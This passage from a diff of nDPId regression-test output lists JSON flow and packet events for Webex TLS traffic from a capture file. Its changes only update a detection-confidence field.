{"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570633357,"flow_last_seen":1444570633811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570633811,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570633357,"flow_last_seen":1444570633362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570633362,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570633357,"flow_last_seen":1444570633811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570633811,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636151,"flow_last_seen":1444570636151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1444570636151,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636151,"pkt":"ABoRAAACABoRAAABCABFAAA8tbVAAEAGMwwKCAABch3V1KL+AbsYGndcAAAAAKACOQjFmAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1444570636154,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636154,"pkt":"ABoRAAACABoRAAABCABFAAAoAY1AABAGF0lyHdXUCggAAQG7ov7n5YijGBp3XVAS\/\/+5HQAA"} @@ -57,24 +57,24 @@ 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636155,"flow_last_seen":1444570636155,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636155,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1444570636155,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636155,"pkt":"ABoRAAACABoRAAABCABFAAA8NxlAAEAGu0sKCAABch3MMcm+AbvkVPXwAAAAAKACOQhdrAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1444570636157,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636157,"pkt":"ABoRAAACABoRAAABCABFAAAoAY5AABAGIOtyHcwxCggAAQG7yb4bqwoP5FT18VAS\/\/+cAAAA"} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636151,"flow_last_seen":1444570636157,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636157,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636151,"flow_last_seen":1444570636157,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636157,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1444570636158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636158,"pkt":"ABoRAAACABoRAAABCABFAAAoNxpAAEAGu14KCAABch3MMcm+AbvkVPXxG6sKEFAQOQhi+QAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636155,"flow_last_seen":1444570636159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636159,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636155,"flow_last_seen":1444570636159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636159,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636160,"flow_last_seen":1444570636160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636160,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1444570636160,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636160,"pkt":"ABoRAAACABoRAAABCABFAAA80GxAAEAGr+EKCAAB0cXen7mKAbt7nBKGAAAAAKACOQhH7AAAAgQFtAQCCAoATMLqAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1444570636163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAoAZFAABAGrtHRxd6fCggAAQG7uYqEY+15e5wSh1AS\/\/86HgAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1444570636163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAo0G1AAEAGr\/QKCAAB0cXen7mKAbt7nBKHhGPtelAQOQgBFwAA"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636160,"flow_last_seen":1444570636164,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636160,"flow_last_seen":1444570636164,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636170,"flow_last_seen":1444570636170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636170,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1444570636170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636170,"pkt":"ABoRAAACABoRAAABCABFAAA8c99AAEAGAvcKCAABQER5meEvAbvnI7E0AAAAAKACOQgMmAAAAgQFtAQCCAoATMLrAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1444570636175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoAZNAABAGpVdARHmZCggAAQG74S8Y3E7L5yOxNVAS\/\/8JAQAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1444570636175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoc+BAAEAGAwoKCAABQER5meEvAbvnI7E1GNxOzFAQOQjP+QAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636170,"flow_last_seen":1444570636176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636176,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636170,"flow_last_seen":1444570636176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636176,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636180,"flow_last_seen":1444570636180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636180,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1444570636180,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636180,"pkt":"ABoRAAACABoRAAABCABFAAA8nw9AAEAGbDMKCAABPm3nA7L2AbufQl3jAAAAAKACOQhqbwAAAgQFtAQCCAoATMLsAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1444570636183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAoAZVAABAGOcI+becDCggAAQG7svZgvaIcn0Jd5FAS\/\/\/LpgAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1444570636183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAonxBAAEAGbEYKCAABPm3nA7L2AbufQl3kYL2iHVAQOQiSnwAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636180,"flow_last_seen":1444570636185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636185,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636180,"flow_last_seen":1444570636185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636185,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636248,"flow_last_seen":1444570636248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636248,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1444570636248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636248,"pkt":"ABoRAAACABoRAAABCABFAAA8NIdAAEAGU1wKCAABQERojK3MAbt5hvZ2AAAAAKACOQh5XQAAAgQFtAQCCAoATMLxAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1444570636252,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636252,"pkt":"ABoRAAACABoRAAABCABFAAAoAZdAABAGtmBARGiMCggAAQG7rcyGeQmJeYb2d1AS\/\/9NcQAA"} @@ -91,20 +91,20 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1444570636264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636264,"pkt":"ABoRAAACABoRAAABCABFAAA8YelAAEAGFSMKCAABQER5Y9qhAbtb96MaAAAAAKACOQismgAAAgQFtAQCCAoATMLzAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1444570636268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoAZtAABAGpYVARHljCggAAQG72qGkCFzlW\/ejG1AS\/\/8PxQAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1444570636268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636268,"pkt":"ABoRAAACABoRAAABCABFAAAoNIhAAEAGU28KCAABQERojK3MAbt5hvZ3hnkJilAQOQgUagAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636248,"flow_last_seen":1444570636268,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636268,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 